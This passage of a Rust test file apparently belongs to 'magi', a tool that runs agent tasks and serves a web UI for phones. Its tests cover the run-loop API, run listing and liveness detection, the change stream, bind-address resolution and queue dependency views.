6752 async fn a_stale_status_file_is_not_a_foreign_owner() {
6753 let f = Fixture::start().await;
6754 write_daemon(
6755 f.home.path(),
6756 Timestamp::now() - jiff::SignedDuration::from_secs(60),
6757 );
6758
6759 let res = f.post("/api/loop", Some(r#"{"running":true}"#)).await;
6760 assert_eq!(
6761 res.status, 200,
6762 "a daemon killed a minute ago must not lock the loop out of its \
6763 own home for good: {}",
6764 res.body
6765 );
6766 assert_eq!(res.json()["running"], true);
6767
6768 f.post("/api/loop", Some(r#"{"running":false}"#)).await;
6769 }
6770
6771 #[tokio::test]
6772 async fn loop_rev_moves_on_a_start_so_a_phone_learns_without_polling() {
6773 let f = Fixture::start().await;
6774 let before = f.get("/api/health").await.json()["loop_rev"]
6775 .as_u64()
6776 .expect("a loop revision");
6777
6778 f.post("/api/loop", Some(r#"{"running":true}"#)).await;
6779
6780 let after = f.get("/api/health").await.json()["loop_rev"]
6781 .as_u64()
6782 .expect("a loop revision");
6783 assert!(
6784 after > before,
6785 "the loop is in-process state, so this counter is the only thing \
6786 that tells a second device the first one started it: {before} -> \
6787 {after}"
6788 );
6789
6790 f.post("/api/loop", Some(r#"{"running":false}"#)).await;
6791 }
6792
6793 #[tokio::test]
6794 async fn a_loop_that_failed_says_why_and_does_not_read_as_running() {
6795 let f = Fixture::with_loop(launch_broken).await;
6796
6797 let res = f.post("/api/loop", Some(r#"{"running":true}"#)).await;
6798 assert_eq!(
6799 res.status, 200,
6800 "starting it is not the failure: {}",
6801 res.body
6802 );
6803
6804 let view = settled(&f, |v| v["last_error"].is_string()).await;
6805 assert_eq!(
6806 view["running"], false,
6807 "a loop that died must not read as running, or the operator has \
6808 nothing to press: {view}"
6809 );
6810 assert_eq!(view["owned"], false);
6811 assert!(
6812 view["last_error"]
6813 .as_str()
6814 .is_some_and(|e| e.contains("read-only file system")),
6815 "the phone is where a loop that died at 3am is visible: {view}"
6816 );
6817
6818 let again = f.post("/api/loop", Some(r#"{"running":true}"#)).await;
6821 assert_eq!(again.status, 200, "{}", again.body);
6822 assert_eq!(
6823 again.json()["last_error"],
6824 Value::Null,
6825 "a fresh start does not keep showing why the last one died"
6826 );
6827 }
6828
6829 #[tokio::test(flavor = "multi_thread", worker_threads = 2)]
6841 async fn the_deck_answers_while_it_parks_and_frees_the_address_first() {
6842 let home = TempDir::new().expect("temp home");
6843 let runs = home.path().join("runs");
6844 std::fs::create_dir_all(&runs).expect("runs dir");
6845 let ui = Ui::new(
6846 Queue::at(home.path().join("queue")),
6847 Questions::at(home.path().join("questions")),
6848 Talks::at(home.path().join("talks")),
6849 runs,
6850 home.path().to_path_buf(),
6851 PathBuf::from("/repo/magi"),
6852 )
6853 .with_worktrees_root(home.path().join("wt"))
6854 .with_launch(launch_knocking_on_the_way_out);
6855 let looping = ui.looping();
6856 let listener = tokio::net::TcpListener::bind((Ipv4Addr::LOCALHOST, 0))
6857 .await
6858 .expect("bind loopback");
6859 let addr = listener.local_addr().expect("local addr");
6860 *PARK_KNOCK.lock().expect("park knock") = Some(addr);
6861 let served = tokio::spawn(axum::serve(listener, ui.router()).into_future());
6862
6863 let started = request(addr, "POST", "/api/loop", Some(r#"{"running":true}"#)).await;
6864 assert_eq!(started.status, 200, "the loop starts: {}", started.body);
6865
6866 let bound = std::sync::Mutex::new(None);
6881 hand_over(home.path(), &looping, served, || {
6882 let deadline = std::time::Instant::now() + std::time::Duration::from_secs(5);
6883 let attempt = loop {
6884 match std::net::TcpListener::bind(addr) {
6885 Ok(l) => {
6886 drop(l);
6887 break Ok(());
6888 }
6889 Err(e)
6890 if e.kind() == std::io::ErrorKind::AddrInUse
6891 && std::time::Instant::now() < deadline =>
6892 {
6893 std::thread::sleep(std::time::Duration::from_millis(10));
6894 }
6895 Err(e) => break Err(e.to_string()),
6896 }
6897 };
6898 *bound.lock().expect("bound") = Some(attempt);
6899 Ok(())
6900 })
6901 .await
6902 .expect("hand over");
6903
6904 assert_eq!(
6905 *PARK_HEARD.lock().expect("park heard"),
6906 Some(200),
6907 "the deck must answer while the loop is parking"
6908 );
6909 let attempt = bound
6910 .lock()
6911 .expect("bound")
6912 .take()
6913 .expect("the successor was started");
6914 assert!(
6915 attempt.is_ok(),
6916 "and the address must be free by the time it is: {attempt:?}"
6917 );
6918 }
6919
6920 #[tokio::test]
6921 async fn a_newer_daemon_status_file_still_renders() {
6922 let f = Fixture::start().await;
6923 std::fs::write(
6926 f.home.path().join("daemon.json"),
6927 serde_json::json!({
6928 "schema": 2,
6929 "updated_at": Timestamp::now().to_string(),
6930 "idle": true,
6931 "surprise": { "nested": [1, 2, 3] },
6932 })
6933 .to_string(),
6934 )
6935 .expect("write daemon.json");
6936
6937 let health = f.get("/api/health").await;
6938
6939 assert_eq!(health.status, 200);
6940 assert_eq!(health.json()["daemon"]["running"], true);
6941 }
6942
6943 #[tokio::test]
6944 async fn a_corrupt_run_is_skipped_in_the_list_and_explained_on_its_own_route() {
6945 let f = Fixture::start().await;
6946 write_run(&f.runs(), "20260902-140501-good", RunStatus::Ready);
6947 let broken = f.runs().join("20260902-140502-bad");
6948 std::fs::create_dir_all(&broken).expect("run dir");
6949 std::fs::write(broken.join("run.json"), "{ truncated").expect("write run.json");
6950
6951 let list = f.get("/api/runs").await;
6952 let detail = f.get("/api/runs/20260902-140502-bad").await;
6953
6954 assert_eq!(list.status, 200);
6955 let listed = list.json();
6956 let ids: Vec<&str> = listed
6957 .as_array()
6958 .expect("an array")
6959 .iter()
6960 .map(|r| r["id"].as_str().expect("an id"))
6961 .collect();
6962 assert_eq!(
6963 ids,
6964 vec!["20260902-140501-good"],
6965 "one unreadable run must not cost the operator the whole history"
6966 );
6967 assert_eq!(detail.status, 500);
6968 assert!(
6969 detail.json()["error"]
6970 .as_str()
6971 .is_some_and(|e| e.contains("run.json")),
6972 "the failure names the file to look at: {}",
6973 detail.body
6974 );
6975 let health = f.get("/api/health").await;
6979 assert_eq!(health.json()["runs_unreadable"], 1);
6980 }
6981
6982 #[tokio::test]
6983 async fn a_run_is_summarised_for_the_list_and_served_whole_on_its_own_route() {
6984 let f = Fixture::start().await;
6985 write_run(&f.runs(), "20260902-140501-a1b2", RunStatus::Ready);
6986
6987 let summary = f.get("/api/runs").await.json();
6988 let row = &summary[0];
6989 assert_eq!(row["short"], "a1b2");
6990 assert_eq!(row["status"], "ready");
6991 assert_eq!(row["done"], true);
6992 assert_eq!(row["title"], "Add a web UI");
6993 assert_eq!(row["repo_name"], "magi");
6994 assert_eq!(row["judges"], 3);
6995 assert_eq!(row["winner"], Value::Null);
6996 assert_eq!(row["reviews"], 0);
6997
6998 let detail = f.get("/api/runs/a1b2").await;
7001 assert_eq!(detail.status, 200);
7002 assert_eq!(detail.json()["base_branch"], "main");
7003 assert_eq!(detail.json()["id"], "20260902-140501-a1b2");
7004 }
7005
7006 #[tokio::test]
7014 async fn a_mode_none_ready_run_is_flagged_unmerged_by_design_everywhere() {
7015 let f = Fixture::start().await;
7016
7017 let mut none_run = RunState::new(
7018 PathBuf::from("/repo/magi"),
7019 "main".to_owned(),
7020 "0123456789abcdef".to_owned(),
7021 "Add a web UI".to_owned(),
7022 Config::default(),
7023 );
7024 none_run.id = "20260902-140503-none".to_owned();
7025 none_run.status = RunStatus::Ready;
7026 none_run.merge = Some(crate::run::MergeOutcome {
7027 mode: crate::config::MergeMode::None,
7028 ok: true,
7029 detail: "git -C /repo merge --no-ff magi/x/A".to_owned(),
7030 });
7031 write_state(&f.runs(), &none_run);
7032
7033 let mut pr_run = RunState::new(
7034 PathBuf::from("/repo/magi"),
7035 "main".to_owned(),
7036 "0123456789abcdef".to_owned(),
7037 "Add a web UI".to_owned(),
7038 Config::default(),
7039 );
7040 pr_run.id = "20260902-140504-prcl".to_owned();
7041 pr_run.status = RunStatus::Ready;
7042 pr_run.merge = Some(crate::run::MergeOutcome {
7043 mode: crate::config::MergeMode::Pr,
7044 ok: false,
7045 detail: "https://example.com/pr/1 was closed without merging".to_owned(),
7046 });
7047 write_state(&f.runs(), &pr_run);
7048
7049 let summary = f.get("/api/runs").await.json();
7050 let rows: std::collections::HashMap<&str, &Value> = summary
7051 .as_array()
7052 .expect("an array")
7053 .iter()
7054 .map(|r| (r["id"].as_str().expect("an id"), r))
7055 .collect();
7056 assert_eq!(rows[none_run.id.as_str()]["status"], "ready");
7057 assert_eq!(
7058 rows[none_run.id.as_str()]["unmerged_by_design"],
7059 true,
7060 "a mode-none Ready must be flagged in the list"
7061 );
7062 assert_eq!(
7063 rows[pr_run.id.as_str()]["unmerged_by_design"],
7064 false,
7065 "a Ready reached by a closed pull request is a different case"
7066 );
7067
7068 let none_detail = f.get(&format!("/api/runs/{}", none_run.id)).await.json();
7069 assert_eq!(none_detail["status"], "ready");
7070 assert_eq!(none_detail["unmerged_by_design"], true);
7071
7072 let pr_detail = f.get(&format!("/api/runs/{}", pr_run.id)).await.json();
7073 assert_eq!(pr_detail["unmerged_by_design"], false);
7074 }
7075
7076 #[tokio::test]
7081 async fn run_detail_reports_active_seats_and_whether_a_daemon_confirms_them() {
7082 let f = Fixture::start().await;
7083 let id = "20260902-140502-bbbb";
7087 let mut state = RunState::new(
7088 PathBuf::from("/repo/magi"),
7089 "main".to_owned(),
7090 "0123456789abcdef".to_owned(),
7091 "Add a web UI".to_owned(),
7092 Config::default(),
7093 );
7094 state.id = id.to_owned();
7095 state.status = RunStatus::Judging;
7096 state.seat_started("judge", "judge-2", std::time::Duration::from_secs(120), 0);
7097 let dir = f.runs().join(id);
7098 std::fs::create_dir_all(&dir).expect("run dir");
7099 std::fs::write(
7100 dir.join("run.json"),
7101 serde_json::to_string_pretty(&state).expect("serialize run"),
7102 )
7103 .expect("write run.json");
7104
7105 let cold = f.get(&format!("/api/runs/{id}")).await.json();
7111 assert_eq!(cold["active"]["judge-2"]["node"], "judge");
7112 assert_eq!(cold["live"], "unknown", "{cold}");
7113
7114 write_daemon(f.home.path(), Timestamp::now());
7117 let warm = f.get(&format!("/api/runs/{id}")).await.json();
7118 assert_eq!(warm["live"], "live", "{warm}");
7119 }
7120
7121 #[tokio::test]
7128 async fn run_detail_reads_a_manual_run_with_a_live_driver_pid_as_live_without_a_daemon() {
7129 let f = Fixture::start().await;
7130 let id = "20260922-090000-cccc";
7131 let mut state = RunState::new(
7132 PathBuf::from("/repo/magi"),
7133 "main".to_owned(),
7134 "0123456789abcdef".to_owned(),
7135 "Review only".to_owned(),
7136 Config::default(),
7137 );
7138 state.id = id.to_owned();
7139 state.status = RunStatus::Reviewing;
7140 state.seat_started("review", "review-1", std::time::Duration::from_secs(120), 0);
7141 state.driver_pid = Some(std::process::id());
7147 state.driver_started_at = Some(
7148 crate::proc::process_started_at(std::process::id())
7149 .expect("this test process's own start time must be queryable"),
7150 );
7151 let dir = f.runs().join(id);
7152 std::fs::create_dir_all(&dir).expect("run dir");
7153 std::fs::write(
7154 dir.join("run.json"),
7155 serde_json::to_string_pretty(&state).expect("serialize run"),
7156 )
7157 .expect("write run.json");
7158
7159 let detail = f.get(&format!("/api/runs/{id}")).await.json();
7160 assert_eq!(detail["live"], "live", "{detail}");
7161 }
7162
7163 #[tokio::test]
7169 async fn run_detail_reads_a_live_pid_as_dead_once_its_start_time_no_longer_matches() {
7170 let f = Fixture::start().await;
7171 let id = "20260922-090100-dddd";
7172 let mut state = RunState::new(
7173 PathBuf::from("/repo/magi"),
7174 "main".to_owned(),
7175 "0123456789abcdef".to_owned(),
7176 "Review only".to_owned(),
7177 Config::default(),
7178 );
7179 state.id = id.to_owned();
7180 state.status = RunStatus::Reviewing;
7181 state.seat_started("review", "review-1", std::time::Duration::from_secs(120), 0);
7182 state.driver_pid = Some(std::process::id());
7187 state.driver_started_at = Some("not-this-processes-real-start-time".to_owned());
7188 let dir = f.runs().join(id);
7189 std::fs::create_dir_all(&dir).expect("run dir");
7190 std::fs::write(
7191 dir.join("run.json"),
7192 serde_json::to_string_pretty(&state).expect("serialize run"),
7193 )
7194 .expect("write run.json");
7195
7196 let detail = f.get(&format!("/api/runs/{id}")).await.json();
7197 assert_eq!(detail["live"], "dead", "{detail}");
7198 }
7199
7200 #[test]
7204 fn summarize_asks_about_each_pid_once_and_keeps_the_row_meaning() {
7205 let mk = |id: &str, pid: Option<u32>| {
7206 let mut s = RunState::new(
7207 PathBuf::from("/repo/magi"),
7208 "main".to_owned(),
7209 "0123456789abcdef".to_owned(),
7210 "Add a web UI".to_owned(),
7211 Config::default(),
7212 );
7213 s.id = id.to_owned();
7214 s.driver_pid = pid;
7215 s.driver_started_at = Some("t0".to_owned());
7216 s
7217 };
7218 let states = vec![
7219 mk("20260902-140502-aaaa", Some(77)),
7220 mk("20260902-140502-bbbb", Some(77)),
7221 mk("20260902-140502-cccc", Some(77)),
7222 mk("20260902-140502-dddd", None),
7223 ];
7224 let open: HashSet<String> = ["20260902-140502-bbbb".to_owned()].into();
7225 let claimed: HashSet<String> = ["20260902-140502-dddd".to_owned()].into();
7226 let sup: HashMap<String, String> = [(
7227 "20260902-140502-aaaa".to_owned(),
7228 "20260902-140502-cccc".to_owned(),
7229 )]
7230 .into();
7231
7232 let status_calls = std::cell::Cell::new(0);
7233 let identity_calls = std::cell::Cell::new(0);
7234 let probe = std::cell::RefCell::new(crate::proc::ProcProbe::new(
7235 |_| {
7236 status_calls.set(status_calls.get() + 1);
7237 Some(true)
7238 },
7239 |_| {
7240 identity_calls.set(identity_calls.get() + 1);
7241 Some("t0".to_owned())
7242 },
7243 ));
7244 let rows = summarize(
7245 states,
7246 &open,
7247 &claimed,
7248 &sup,
7249 |p| probe.borrow_mut().status(p),
7250 |p| probe.borrow_mut().started_at(p),
7251 );
7252
7253 assert_eq!(status_calls.get(), 1, "one pid, one status query");
7254 assert_eq!(identity_calls.get(), 1, "one pid, one identity query");
7255 assert_eq!(rows.len(), 4);
7256 assert!(!rows[0].waiting && rows[1].waiting);
7257 assert_eq!(rows[0].live, crate::run::Liveness::Live);
7258 assert_eq!(rows[3].live, crate::run::Liveness::Live, "claim alone");
7259 assert_eq!(rows[0].superseded_by.as_deref(), Some("cccc"));
7260 assert_eq!(rows[1].superseded_by, None);
7261 }
7262
7263 #[test]
7264 fn run_list_exposes_a_confirmed_dead_driver_for_stale_presentation() {
7265 let mut state = RunState::new(
7266 PathBuf::from("/repo/magi"),
7267 "main".to_owned(),
7268 "0123456789abcdef".to_owned(),
7269 "Review only".to_owned(),
7270 Config::default(),
7271 );
7272 state.id = "20260922-090200-dead".to_owned();
7273 state.status = RunStatus::Reviewing;
7274 let row = serde_json::to_value(RunSummary::of(&state, false, crate::run::Liveness::Dead))
7275 .expect("serialize list row");
7276 assert_eq!(row["status"], "reviewing");
7277 assert_eq!(row["live"], "dead", "{row}");
7278 assert!(!row["done"].as_bool().unwrap());
7279 }
7280
7281 #[tokio::test]
7282 async fn the_run_list_is_newest_first_and_honours_a_limit() {
7283 let f = Fixture::start().await;
7284 for id in [
7285 "20260902-140501-aaaa",
7286 "20260902-140502-bbbb",
7287 "20260902-140503-cccc",
7288 ] {
7289 write_run(&f.runs(), id, RunStatus::Merged);
7290 }
7291
7292 let all = f.get("/api/runs").await.json();
7293 let capped = f.get("/api/runs?limit=2").await.json();
7294
7295 assert_eq!(all[0]["id"], "20260902-140503-cccc");
7296 assert_eq!(all.as_array().map(Vec::len), Some(3));
7297 assert_eq!(capped.as_array().map(Vec::len), Some(2));
7298 assert_eq!(capped[0]["id"], "20260902-140503-cccc");
7299 }
7300
7301 #[tokio::test]
7302 async fn the_report_route_serves_the_terminal_report_as_plain_text() {
7303 let f = Fixture::start().await;
7304 write_run(&f.runs(), "20260902-140501-a1b2", RunStatus::Blocked);
7305
7306 let res = f.get("/api/runs/20260902-140501-a1b2/report").await;
7307
7308 assert_eq!(res.status, 200);
7309 assert!(
7310 res.headers
7311 .contains("content-type: text/plain; charset=utf-8"),
7312 "a browser must render it, not download it: {}",
7313 res.headers
7314 );
7315 assert!(
7319 res.body.contains("20260902-140501-a1b2"),
7320 "the report is about the run that was asked for: {}",
7321 res.body
7322 );
7323 }
7324
7325 #[tokio::test]
7326 async fn the_front_end_is_served_from_the_binary_with_types_a_phone_renders() {
7327 let f = Fixture::start().await;
7328
7329 let html = f.get("/").await;
7330 let css = f.get("/app.css").await;
7331 let js = f.get("/app.js").await;
7332
7333 assert_eq!((html.status, css.status, js.status), (200, 200, 200));
7334 assert!(
7335 html.headers
7336 .contains("content-type: text/html; charset=utf-8")
7337 );
7338 assert!(css.headers.contains("content-type: text/css"));
7339 assert!(js.headers.contains("content-type: text/javascript"));
7340 assert_eq!(html.body, INDEX_HTML, "compiled in, never read from disk");
7341 }
7342
7343 #[test]
7344 fn review_rounds_label_a_distinct_verified_head() {
7345 assert!(APP_JS.contains("round.verified_head"));
7346 assert!(APP_JS.contains("verified HEAD"));
7347 assert!(APP_JS.contains("verified ${String(round.verified_head).slice(0, 7)}"));
7348 }
7349
7350 #[test]
7351 fn queue_ui_presents_blocked_dependencies_and_resolved_questions() {
7352 assert!(APP_JS.contains("blocked: { glyph:"));
7356 assert!(APP_JS.contains("Blocked. Waiting on another task or question to resolve."));
7357
7358 assert!(APP_JS.contains("function classifyBlockedBy(blockedBy, tasksById, questionsById)"));
7362 assert!(
7363 APP_JS.contains(
7364 "if (parts.length) noteText = `${noteText} Waiting on ${parts.join(\" and \")}.`;"
7365 ),
7366 "the note line must name what a blocked task is waiting on, not just that it is blocked"
7367 );
7368 assert!(APP_JS.contains("if (status === \"blocked\") {"));
7372
7373 assert!(APP_JS.contains("function depNode(id, byId, questionNodes)"));
7377 assert!(APP_JS.contains("questionNodes.set(dep, questionsById.get(dep));"));
7378 assert!(
7379 APP_JS.contains("location.hash = \"#/questions\";"),
7380 "a question node must jump to the Questions screen, not pretend to be a task"
7381 );
7382
7383 assert!(APP_JS.contains("Resolved questions"));
7386 assert!(APP_JS.contains("r.answersList.append("));
7387 assert!(APP_CSS.contains(".task-answers"));
7388 }
7389
7390 #[test]
7391 fn review_rounds_tell_a_stale_verification_and_a_resource_block_apart_from_a_real_result() {
7392 assert!(
7393 APP_JS.contains("round.verified_head !== round.head"),
7394 "a round that verified an earlier commit must be visibly distinct from one that \
7395 verified the head reviewers are looking at now"
7396 );
7397 assert!(
7398 APP_JS.contains("round.verified_at"),
7399 "when a check ran must be on the wire, not just which commit"
7400 );
7401 assert!(
7402 APP_JS.contains("resource_blocked"),
7403 "a command magi never got to run (shared build cache contention) must not render \
7404 the same as a command that ran and failed"
7405 );
7406 }
7407
7408 #[tokio::test]
7409 async fn the_change_stream_announces_the_current_revisions_on_connect() {
7410 let f = Fixture::start().await;
7411
7412 let mut socket = tokio::net::TcpStream::connect(f.addr)
7413 .await
7414 .expect("connect");
7415 socket
7416 .write_all(
7417 b"GET /api/events HTTP/1.1\r\nHost: magi\r\nAccept: text/event-stream\r\n\r\n",
7418 )
7419 .await
7420 .expect("write request");
7421
7422 let mut seen = String::new();
7425 let mut buf = [0u8; 1024];
7426 while !seen.contains("event: change") {
7427 let read = tokio::time::timeout(Duration::from_secs(5), socket.read(&mut buf))
7428 .await
7429 .expect("the stream must speak within five seconds")
7430 .expect("read");
7431 assert!(read > 0, "the server closed the change stream: {seen}");
7432 seen.push_str(&String::from_utf8_lossy(&buf[..read]));
7433 }
7434
7435 assert!(
7436 seen.to_lowercase()
7437 .contains("content-type: text/event-stream"),
7438 "the browser only reconnects automatically for a real SSE stream: {seen}"
7439 );
7440 let data = seen
7441 .lines()
7442 .find_map(|l| l.strip_prefix("data:"))
7443 .expect("a data line");
7444 let payload: Value = serde_json::from_str(data.trim()).expect("json payload");
7445 assert!(
7446 payload["queue_rev"].is_u64()
7447 && payload["runs_rev"].is_u64()
7448 && payload["questions_rev"].is_u64()
7449 && payload["talks_rev"].is_u64()
7450 && payload["loop_rev"].is_u64(),
7451 "the client needs one revision per store to know what to refetch, \
7452 and `talks_rev` is the only notification a standing talk gets - a \
7453 phone whose radio slept through a turn learns about it here, as \
7454 does one whose operator started the loop from another device: \
7455 {payload}"
7456 );
7457
7458 let health = f.get("/api/health").await.json();
7465 for key in [
7466 "queue_rev",
7467 "runs_rev",
7468 "questions_rev",
7469 "talks_rev",
7470 "loop_rev",
7471 ] {
7472 assert!(
7473 health[key].is_u64(),
7474 "health is the change stream's fallback and is missing `{key}`: {health}"
7475 );
7476 }
7477 }
7478
7479 #[tokio::test]
7480 async fn a_new_turn_on_a_talk_moves_the_change_stream_revision() {
7481 let f = Fixture::start().await;
7482 let before = f.get("/api/health").await.json()["talks_rev"]
7483 .as_u64()
7484 .expect("talks_rev");
7485
7486 let talk = seed_talk(&f, "20260904-014455-ab12", "open");
7487 std::thread::sleep(Duration::from_millis(10));
7488 let mut on_disk = f.talks().get(&talk).expect("get seeded talk");
7489 on_disk.turns.push(crate::talk::Turn {
7490 who: crate::talk::Who::Operator,
7491 body: "a new turn".to_owned(),
7492 at: Timestamp::now(),
7493 attachments: Vec::new(),
7494 });
7495 f.talks().put(&mut on_disk).expect("record a turn");
7496
7497 let after = f.get("/api/health").await.json()["talks_rev"]
7498 .as_u64()
7499 .expect("talks_rev");
7500 assert_ne!(
7501 before, after,
7502 "a phone must be able to notice a talk's reply without polling every store"
7503 );
7504 }
7505
7506 #[test]
7507 fn bind_reads_back_from_the_spelling_the_cli_prints() {
7508 for bind in [Bind::Auto, Bind::Addr(IpAddr::V4(Ipv4Addr::LOCALHOST))] {
7512 assert_eq!(bind.to_string().parse::<Bind>(), Ok(bind));
7513 }
7514 assert_eq!("AUTO".parse::<Bind>(), Ok(Bind::Auto));
7515 assert!("everywhere".parse::<Bind>().is_err());
7516 }
7517
7518 #[test]
7519 fn an_explicit_bind_address_is_taken_verbatim() {
7520 let asked = IpAddr::V4(Ipv4Addr::new(192, 168, 1, 20));
7521
7522 let (addr, warning) = resolve_bind(&Bind::Addr(asked));
7523
7524 assert_eq!(addr, asked);
7525 assert!(
7526 warning.is_none(),
7527 "an operator who named an address gets no lecture"
7528 );
7529 }
7530
7531 #[test]
7532 fn bind_auto_either_finds_a_tailnet_address_or_says_the_ui_is_local_only() {
7533 let (addr, warning) = resolve_bind(&Bind::Auto);
7534
7535 match addr {
7542 IpAddr::V4(ip) if is_tailnet(&ip) => {
7543 assert!(warning.is_none(), "a tailnet address needs no warning");
7544 }
7545 other => {
7546 assert_eq!(other, IpAddr::V4(Ipv4Addr::LOCALHOST));
7547 let warning = warning.expect("a fallback has to explain itself");
7548 assert!(
7549 warning.contains("127.0.0.1") && warning.contains("local-only"),
7550 "the warning says what happened and what it costs: {warning}"
7551 );
7552 }
7553 }
7554 }
7555
7556 #[test]
7557 fn only_the_cgnat_block_counts_as_a_tailnet_address() {
7558 assert!(is_tailnet(&Ipv4Addr::new(100, 64, 0, 1)));
7562 assert!(is_tailnet(&Ipv4Addr::new(100, 127, 255, 254)));
7563 assert!(!is_tailnet(&Ipv4Addr::new(100, 63, 255, 255)));
7564 assert!(!is_tailnet(&Ipv4Addr::new(100, 128, 0, 1)));
7565 assert!(!is_tailnet(&Ipv4Addr::new(127, 0, 0, 1)));
7566 }
7567
7568 #[test]
7569 fn an_ambiguous_prefix_is_a_bad_request_and_a_missing_one_is_not_found() {
7570 let ids = vec![
7571 "20260902-140501-aaaa".to_owned(),
7572 "20260902-140502-aabb".to_owned(),
7573 ];
7574
7575 let missing = pick(ids.clone(), "zzzz", "run").expect_err("no match");
7576 let ambiguous = pick(ids.clone(), "202609", "run").expect_err("two matches");
7577 let short = pick(ids, "aabb", "run").expect("the short id is the tail of an id");
7578
7579 assert_eq!(missing.status, StatusCode::NOT_FOUND);
7580 assert_eq!(ambiguous.status, StatusCode::BAD_REQUEST);
7581 assert_eq!(short, "20260902-140502-aabb");
7582 }
7583 #[tokio::test]
7584 async fn a_panel_reaches_its_assets_by_the_bare_name_it_was_told_to_use() {
7585 let fx = Fixture::start().await;
7591 let id = panel(
7592 &fx,
7593 "<img src=\"shot.png\">",
7594 &[("shot.png", b"\x89PNG\r\n\x1a\n")],
7595 );
7596
7597 let doc = fx
7599 .get(&format!("/api/questions/{id}/panel/index.html"))
7600 .await;
7601 assert_eq!(doc.status, 200, "{}", doc.body);
7602 assert_eq!(doc.header("content-type"), Some("text/html; charset=utf-8"));
7603
7604 let sibling = fx.get(&format!("/api/questions/{id}/panel/shot.png")).await;
7605 assert_eq!(sibling.status, 200, "{}", sibling.body);
7606 assert_eq!(sibling.header("content-type"), Some("image/png"));
7607 assert_eq!(
7608 sibling.header("content-security-policy"),
7609 Some(PANEL_CSP),
7610 "the sibling route must carry the same policy as the asset route"
7611 );
7612
7613 assert_eq!(
7616 fx.head(&format!("/api/questions/{id}/panel")).await.status,
7617 200
7618 );
7619 }
7620
7621 #[test]
7622 fn runs_revision_moves_when_deleting_an_older_run() {
7623 let temp = TempDir::new().expect("tempdir");
7624 let runs = temp.path().join("runs");
7625 std::fs::create_dir_all(&runs).expect("create runs dir");
7626
7627 assert_eq!(runs_revision(&runs), 0, "empty runs has 0 revision");
7628
7629 write_run(&runs, "20260901-100000-old1", RunStatus::Merged);
7630 std::thread::sleep(Duration::from_millis(10));
7631 write_run(&runs, "20260902-100000-new2", RunStatus::Merged);
7632
7633 let rev_before = runs_revision(&runs);
7634 assert!(rev_before > 0);
7635
7636 let old_dir = runs.join("20260901-100000-old1");
7637 std::fs::remove_dir_all(&old_dir).expect("remove old run");
7638
7639 let rev_after = runs_revision(&runs);
7640 assert_ne!(
7641 rev_before, rev_after,
7642 "deleting an older run must change the revision so other clients see the deletion"
7643 );
7644 }
7645
7646 fn write_state(runs: &FsPath, state: &RunState) {
7651 let dir = runs.join(&state.id);
7652 std::fs::create_dir_all(&dir).expect("run dir");
7653 std::fs::write(
7654 dir.join("run.json"),
7655 serde_json::to_string_pretty(state).expect("serialize run"),
7656 )
7657 .expect("write run.json");
7658 }
7659
7660 #[test]
7665 fn runs_revision_moves_when_a_seat_starts_and_again_when_it_finishes() {
7666 let temp = TempDir::new().expect("tempdir");
7667 let runs = temp.path().join("runs");
7668 std::fs::create_dir_all(&runs).expect("create runs dir");
7669 let mut state = RunState::new(
7670 PathBuf::from("/repo/magi"),
7671 "main".to_owned(),
7672 "0123456789abcdef".to_owned(),
7673 "task".to_owned(),
7674 Config::default(),
7675 );
7676 state.id = "20260902-100000-c0de".to_owned();
7677 write_state(&runs, &state);
7678
7679 let rev_idle = runs_revision(&runs);
7680 std::thread::sleep(Duration::from_millis(10));
7681 state.seat_started("judge", "judge-1", std::time::Duration::from_secs(60), 0);
7682 write_state(&runs, &state);
7683 let rev_started = runs_revision(&runs);
7684 assert_ne!(
7685 rev_idle, rev_started,
7686 "a seat starting must move the revision"
7687 );
7688
7689 std::thread::sleep(Duration::from_millis(10));
7690 state.seat_finished("judge-1");
7691 write_state(&runs, &state);
7692 let rev_finished = runs_revision(&runs);
7693 assert_ne!(
7694 rev_started, rev_finished,
7695 "and clearing it again must move the revision a second time"
7696 );
7697 }
7698
7699 #[tokio::test]
7700 async fn queue_json_carries_dependency_fields_and_a_hold_clears_them() {
7701 let fx = Fixture::start().await;
7706 let q = fx.queue();
7707
7708 let mut t = Task::new(
7709 "Task".to_owned(),
7710 "Instruction".to_owned(),
7711 PathBuf::from("/repo"),
7712 Source::Human,
7713 );
7714 t.block(
7715 vec!["20260101-000000-dead".to_owned()],
7716 Some("waiting on Task 1".to_owned()),
7717 );
7718 t.answers.push(crate::queue::AnsweredQuestion {
7719 question: "Which backend?".to_owned(),
7720 answer: "SQLite".to_owned(),
7721 });
7722 q.put(&mut t).expect("put t");
7723
7724 let res = fx.get("/api/queue").await;
7725 assert_eq!(res.status, 200);
7726 let list = res.json();
7727 let view = list
7728 .as_array()
7729 .expect("array")
7730 .iter()
7731 .find(|v| v["id"] == t.id)
7732 .expect("task in list");
7733 assert_eq!(view["status_str"], "blocked");
7734 assert_eq!(
7735 view["blocked_by"],
7736 serde_json::json!(["20260101-000000-dead"])
7737 );
7738 assert_eq!(view["block_reason"], "waiting on Task 1");
7739 assert_eq!(view["answers"][0]["question"], "Which backend?");
7740 assert_eq!(view["answers"][0]["answer"], "SQLite");
7741
7742 let res = fx
7746 .post(&format!("/api/queue/{}/hold", t.short()), None)
7747 .await;
7748 assert_eq!(res.status, 200);
7749 let held = res.json();
7750 assert_eq!(held["status_str"], "held");
7751 assert_eq!(held["blocked_by"], serde_json::json!([]));
7752 assert!(held["block_reason"].is_null());
7753 assert_eq!(held["answers"][0]["answer"], "SQLite");
7754 }
7755
7756 #[tokio::test]
7757 async fn queue_json_shows_a_blocked_chain_and_its_stuck_root() {
7758 let fx = Fixture::start().await;
7759 let q = fx.queue();
7760 let mk = |title: &str| {
7761 Task::new(
7762 title.to_owned(),
7763 "Instruction".to_owned(),
7764 PathBuf::from("/repo"),
7765 Source::Human,
7766 )
7767 };
7768 let mut root = mk("root");
7769 root.hold_manual(Some("waiting".to_owned()));
7770 q.put(&mut root).unwrap();
7771 let mut mid = mk("mid");
7772 mid.block(vec![root.id.clone()], None);
7773 q.put(&mut mid).unwrap();
7774 let mut leaf = mk("leaf");
7775 leaf.block(vec![mid.id.clone()], None);
7776 q.put(&mut leaf).unwrap();
7777
7778 let list = fx.get("/api/queue").await.json();
7779 let find = |id: &str| {
7780 list.as_array()
7781 .unwrap()
7782 .iter()
7783 .find(|v| v["id"] == id)
7784 .unwrap()
7785 .clone()
7786 };
7787 let leaf_view = find(&leaf.id);
7788 assert_eq!(
7789 leaf_view["waits_on"],
7790 serde_json::json!([format!("{} (blocked → {} held)", mid.short(), root.short())])
7791 );
7792 assert_eq!(leaf_view["stuck_roots"], serde_json::json!([root.short()]));
7793 assert_eq!(
7794 find(&mid.id)["waits_on"],
